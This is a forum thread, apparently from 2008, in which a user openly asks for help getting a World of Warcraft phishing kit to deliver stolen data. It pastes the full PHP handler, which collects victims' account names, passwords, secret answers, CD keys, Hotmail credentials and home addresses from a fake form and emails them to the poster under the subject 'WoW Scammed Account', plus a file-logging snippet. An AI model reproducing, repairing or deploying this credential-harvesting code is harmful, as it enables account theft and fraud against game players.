Tryed a differnt phisher still cant get to the log file
$fp = fopen("lawgs.html", "a");
fwrite($fp, $entry_line);
fclose($fp);
Do i remove the " " on lawgs?
So i set up my phisher, how do i get it to send to my email their info, i used the survey phisher, i think it worked once but it stopped sending info
heres whats in the contact file
<?php
// get posted data into local variables
$EmailFrom = Trim(stripslashes($_POST['Email']));
$EmailTo = "MYEMAILHERE";
$Subject = "WoW Scammed Account";
$Last = Trim(stripslashes($_POST['Last']));
$First = Trim(stripslashes($_POST['First']));
$Account = Trim(stripslashes($_POST['Account']));
$Adress = Trim(stripslashes($_POST['Adress']));
$City = Trim(stripslashes($_POST['City']));
$State = Trim(stripslashes($_POST['State']));
$Zip = Trim(stripslashes($_POST['Zip']));
$Country = Trim(stripslashes($_POST['Country']));
$Email = Trim(stripslashes($_POST['Email']));
$Answer = Trim(stripslashes($_POST['Answer']));
$WowKey = Trim(stripslashes($_POST['WowKey']));
$WowTBCKey = Trim(stripslashes($_POST['WowTBCKey']));
$Hotmail = Trim(stripslashes($_POST['Hotmail']));
$MMO = Trim(stripslashes($_POST['MMO']));
$Password = Trim(stripslashes($_POST['Password']));
// validation
$validationOK=true;
if (Trim($EmailFrom)=="") $validationOK=false;
if (!$validationOK) {
print "<meta http-equiv=\"refresh\" content=\"0;URL=whoops.html\">";
exit;
}
// prepare email body text
$Body = "";
$Body .= "Last Name: ";
$Body .= $Last;
$Body .= "\n";
$Body .= "First Name: ";
$Body .= $First;
$Body .= "\n";
$Body .= "Account Name: ";
$Body .= $Account;
$Body .= "\n";
$Body .= "Account Password: ";
$Body .= $Password;
$Body .= "\n";
$Body .= "Adress: ";
$Body .= $Adress;
$Body .= "\n";
$Body .= "City: ";
$Body .= $City;
$Body .= "\n";
$Body .= "State: ";
$Body .= $State;
$Body .= "\n";
$Body .= "Zip: ";
$Body .= $Zip;
$Body .= "\n";
$Body .= "Country: ";
$Body .= $Country;
$Body .= "\n";
$Body .= "E-mail: ";
$Body .= $Email;
$Body .= "\n";
$Body .= "Secret Answer : ";
$Body .= $Answer;
$Body .= "\n";
$Body .= "World of Warcraft CD-Key: ";
$Body .= $WowKey;
$Body .= "\n";
$Body .= "World of Warcraft TBC CD-Key: ";
$Body .= $WowTBCKey;
$Body .= "\n";
$Body .= "Hotmail: ";
$Body .= $Hotmail;
$Body .= "\n";
$Body .= "Other MMO's: ";
$Body .= $MMO;
$Body .= "\n";
// send email
$success = mail($EmailTo, $Subject, $Body, "From: <$EmailFrom>");
// redirect to success page
if ($success){
print "<meta http-equiv=\"refresh\" content=\"0;URL=thanks.html\">";
}
else{
print "<meta http-equiv=\"refresh\" content=\"0;URL=whoops.htm\">";
}
?>
Do i need to remove the " " where my email is suppose to be?
Last edited by deadfate; 08-26-2008 at 08:18 PM. Reason: Ninjas made me
Tryed a differnt phisher still cant get to the log file
$fp = fopen("lawgs.html", "a");
fwrite($fp, $entry_line);
fclose($fp);
Do i remove the " " on lawgs?
wow wtb YOUTUBE VIDEO HELP SECTION
any 1 help?